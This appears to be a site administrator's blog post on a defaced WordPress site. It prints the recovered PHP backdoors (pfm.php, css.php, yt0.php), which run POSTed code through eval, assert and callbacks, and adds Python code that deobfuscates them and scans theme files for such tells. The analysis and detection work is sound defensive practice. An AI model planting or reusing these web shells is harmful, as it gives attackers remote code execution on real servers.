Hacked By Muslim Hacker, Hacked By BLEİSY

[Screen cap: WordPress front page defaced with "Hacked By Muslim Hacker, Hacked By BLEİSY"]

A customer site got hacked today. Blue Host, shared service. WP core, plugins, themes all current.

They replaced the index.php in the public_html dir with one containing malware code, and added 2 extra files. Front page was defaced, but the site was left intact.

Added files: 9e09ad (data file) and pfm.php (PHP code). Here's the pfm.php code:

<?php
// Four base64 fragments; concatenated with every "c" removed they decode to the payload.
$or="cIEBldcm";
$lq="9TVFsn";
$avj = str_replace("j","","sjtrj_jrjejpljajcje");   // filler "j" removed: "str_replace"
$zs="FsKCRfUE";
$bu="Y21kJ10pOw==";
$qu = $avj("i", "", "ibiaisie6i4i_dieicoide");       // filler "i" removed: "base64_decode"
$fh = $avj("k","","crkekatkek_kfkukncktkikon");       // filler "k" removed: "create_function"
// create_function('', base64_decode("IEBldmFsKCRfUE9TVFsnY21kJ10pOw==")) builds a function
// whose body is  @eval($_POST['cmd']);  and the next statement calls it.
$hwy = $fh('', $qu($avj("c", "", $or.$zs.$lq.$bu))); $hwy();
?>
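To confirm what pfm.php does without ever executing it, here is an added Python script (not part of the original post) that replays the dropper's string tricks statically: each str_replace deletes one filler letter to rebuild a builtin's name, and the four fragments, joined and stripped of every "c", form a base64 blob holding the real body. The string literals are copied from the code above; nothing else is assumed.

```python
import base64

# String literals copied verbatim from pfm.php (constructed input for this example).
OR_, ZS, LQ, BU = "cIEBldcm", "FsKCRfUE", "9TVFsn", "Y21kJ10pOw=="
AVJ_LITERAL = ("j", "sjtrj_jrjejpljajcje")
QU_LITERAL = ("i", "ibiaisie6i4i_dieicoide")
FH_LITERAL = ("k", "crkekatkek_kfkukncktkikon")


def strip_filler(filler: str, literal: str) -> str:
    """Equivalent of PHP str_replace($filler, '', $literal): drop every filler char."""
    return literal.replace(filler, "")


def decode_pfm() -> dict:
    """Statically resolve pfm.php: the three hidden names, the blob and the payload."""
    resolver = strip_filler(*AVJ_LITERAL)   # $avj: used to build the other two names
    decoder = strip_filler(*QU_LITERAL)     # $qu
    factory = strip_filler(*FH_LITERAL)     # $fh
    # $or.$zs.$lq.$bu with every "c" removed, then passed through $qu (base64_decode).
    blob = strip_filler("c", OR_ + ZS + LQ + BU)
    payload = base64.b64decode(blob).decode("ascii")
    return {"resolver": resolver, "decoder": decoder, "factory": factory,
            "blob": blob, "payload": payload}


def summarize() -> str:
    """Human-readable trace of the deobfuscated dropper."""
    r = decode_pfm()
    return (f"$avj = {r['resolver']}; $qu = {r['decoder']}; $fh = {r['factory']}\n"
            f"$hwy = {r['factory']}('', {r['decoder']}('{r['blob']}'))\n"
            f"$hwy() runs: {r['payload'].strip()}")


if __name__ == "__main__":
    print(summarize())
```

The resolved body is `@eval($_POST['cmd']);`, i.e. any HTTP POST to pfm.php with a `cmd` parameter gets executed as PHP, with the `@` hiding errors. That is the check worth doing on the access logs: POST requests to /pfm.php (and to the other dropped files) show when the shell was first used, which is independent of whatever the theme diff does or does not reveal.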

The hack message used a broken image: http://img.webme.com/pic/f/fbmlkodarsiv/dalgalanan-bayrak.jpg

Blue Host said that the theme allowed file injection, so I compared the theme against the source, and it was pretty close to identical. I could not tell if WordPress was the vector. They replaced the theme, "Lighthouse", with the 2017 theme and the data seems good. I need to check this more.

I found the hacked index.php file on the malwaredecoder site, and again:

[Screen cap: malwaredecoder output for the replaced index.php, "Hacked By Muslim Hacker, Hacked By BLEİSY"]

They referenced a unique URL: http://jnice01.ouuwtizhy563nskt/weilai0.php

and also this line: yumingid=167

Both sound Chinese. weilai means “future”, as in future use.

In the theme directory I found some odd files, which should not be there:

404.php: referenced some odd PHP

AWG.php: unrenderable characters, hack file

css.php

<?php // array_filter() calls the request-supplied callback $e on $_POST['w0w'], e.g. e=assert&w0w=<php> or e=system&w0w=<cmd>
echo '2018'.'2019'; if (isset($_REQUEST['e'])) { $e = $_REQUEST['e']; $arr = array($_POST['w0w'],); array_filter($arr, $e); } ?>

yt0.php

<?php $a=str_replace('x','','axsxxxsexrxtx'); // filler "x" removed: $a is "assert", so this is assert($_POST['yt']) on POSTed PHP
$b=$_POST;@$a($b[yt]);?>

yt9.php: big hack file
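The three readable backdoors share a handful of tells: request data read from a superglobal, a builtin's name assembled by str_replace deleting a filler letter, a variable function call (`$a(...)`), and a callback-taking builtin whose callback comes from a variable. As an added example (not from the post and not a Blue Host tool), here is a Python triage scanner that encodes those tells and resolves the str_replace-built names. The samples are the pfm.php, css.php and yt0.php shown above with the smart quotes normalised, plus a constructed benign functions.php as a control; `scan_directory` is the same check over a real theme folder.

```python
import os
import re

# Constructed samples: the three backdoors quoted in this post (quotes normalised to
# ASCII) plus one made-up benign theme file so the scanner has a negative case.
SAMPLES = {
    "pfm.php": (
        '<?php $or="cIEBldcm"; $lq="9TVFsn"; $avj = str_replace("j","","sjtrj_jrjejpljajcje"); '
        '$zs="FsKCRfUE"; $bu="Y21kJ10pOw=="; $qu = $avj("i", "", "ibiaisie6i4i_dieicoide"); '
        '$fh = $avj("k","","crkekatkek_kfkukncktkikon"); '
        "$hwy = $fh('', $qu($avj(\"c\", \"\", $or.$zs.$lq.$bu))); $hwy(); ?>"
    ),
    "css.php": ("<?php echo '2018'.'2019'; if (isset($_REQUEST['e'])) { $e = $_REQUEST['e']; "
                "$arr = array($_POST['w0w'],); array_filter($arr, $e); }?>"),
    "yt0.php": "<?php $a=str_replace('x','','axsxxxsexrxtx');$b=$_POST;@$a($b[yt]);?>",
    "functions.php": ("<?php function lighthouse_setup() { add_theme_support('title-tag'); } "
                      "add_action('after_setup_theme', 'lighthouse_setup');"),
}

INDICATORS = {
    # Request data reaching a theme file at all is unusual outside search/comment forms.
    "reads_request_superglobal": re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    # $name(...): a PHP variable function call, the usual way a hidden name gets invoked.
    "variable_function_call": re.compile(r"(?<![\w$])\$\w+\s*\("),
    # str_replace('x', '', 'axsxxs...'): one filler character deleted to rebuild a name.
    "str_replace_filler_name": re.compile(
        r"""str_replace\s*\(\s*(["'])(\w)\1\s*,\s*(["'])\3\s*,\s*(["'])(\w*)\4\s*\)"""),
    # Callback-taking builtins whose callback is a variable, e.g. array_filter($arr, $e).
    "variable_callback": re.compile(
        r"\b(?:array_filter|array_walk|usort|uasort|uksort|array_reduce)\s*\([^)]*,\s*\$\w+\s*\)"
        r"|\b(?:array_map|call_user_func|call_user_func_array|register_shutdown_function)"
        r"\s*\(\s*\$\w+\s*,"),
    # Plain-text code execution primitives (the obfuscated files hide these; the regex
    # above catches the hidden form).
    "direct_code_exec": re.compile(
        r"\b(?:eval|assert|create_function|system|shell_exec|passthru|exec)\s*\("),
}


def scan_source(src: str) -> dict:
    """Return the indicators that fire, any str_replace-built names, and a verdict."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    # Resolve str_replace('x', '', 'literal') the same way PHP would: drop the filler.
    resolved = [m.group(5).replace(m.group(2), "")
                for m in INDICATORS["str_replace_filler_name"].finditer(src)]
    # Two independent tells, or any builtin name hidden behind str_replace, is enough
    # to pull the file for manual review; this is triage, not proof.
    suspicious = len(hits) >= 2 or bool(resolved)
    return {"indicators": hits, "resolved_names": resolved, "suspicious": suspicious}


def scan_theme(files: dict) -> dict:
    """Scan an in-memory {path: source} mapping (the embedded samples here)."""
    return {path: scan_source(src) for path, src in files.items()}


def scan_directory(root: str) -> dict:
    """Scan every .php file under a real theme directory on disk."""
    results = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n.endswith(".php"):
                p = os.path.join(dirpath, n)
                # errors="replace" keeps going on files full of unrenderable bytes (AWG.php).
                with open(p, encoding="utf-8", errors="replace") as fh:
                    results[p] = scan_source(fh.read())
    return results


if __name__ == "__main__":
    for path, r in scan_theme(SAMPLES).items():
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{path:14} {flag:10} {r['indicators']} resolved={r['resolved_names']}")
```

Running it on the samples flags pfm.php (variable call plus a str_replace-built `str_replace`), css.php (superglobal plus variable callback) and yt0.php (str_replace-built `assert`), and leaves functions.php alone. Files like yt9.php that are entirely encoded may show only one tell, so a theme directory that is being reinstalled from a backup deserves a look at anything that fires at all; the author's experience that putting the old theme back brought the hack back is exactly the case these extra files cause.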

No other files seem touched. WordPress was not breached, but the account was.

Found very little on Google about this hacker.

Compared the hacked theme with a newly downloaded version from the author and did not see much substantial difference, but when I tried to reinstall the old theme, I got the hack back. Then changed back to 2017 and it was OK. Removed the hacked theme from the site, replaced it with the newly downloaded one and installed it. That seemed to work OK.

Blue Host is having some issues, as the web site has a 15-20 sec delay in response time.
